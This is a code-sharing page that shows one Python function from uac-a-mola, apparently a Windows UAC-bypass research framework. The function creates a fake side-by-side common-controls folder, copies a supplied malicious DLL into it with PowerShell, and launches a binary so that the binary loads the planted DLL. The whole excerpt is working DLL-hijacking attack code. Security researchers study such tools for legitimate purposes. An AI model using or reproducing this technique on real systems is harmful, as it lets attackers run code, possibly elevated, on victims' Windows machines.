generic_dll_hijacking.py 文件源码

python
阅读 23 收藏 0 点赞 0 评论 0

项目:uac-a-mola 作者: ElevenPaths 项目源码 文件源码
def handle_dll_local(self, subpath, binary, clean):
        path = subpath + "\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.15063.0_none_583b8639f462029f\\"
        try:
            print "[+] Creating: " + path
            subprocess.check_call(
                ["powershell", "-C", "mkdir", path, ">", "$null"])
            print "[+] Copying the malicious dll to the path"
            subprocess.check_call(
                ["powershell", "-C", "cp", self.args["malicious_dll"], path])
            prev_pids = psutil.pids()
            print "[*] Executing the binary"
            subprocess.check_call(["powershell", "-C", binary])
        except subprocess.CalledProcessError as error:
            self.print_ko(str(error) + "\n")
评论列表
文章目录


问题


面经


文章

微信
公众号

扫码关注公众号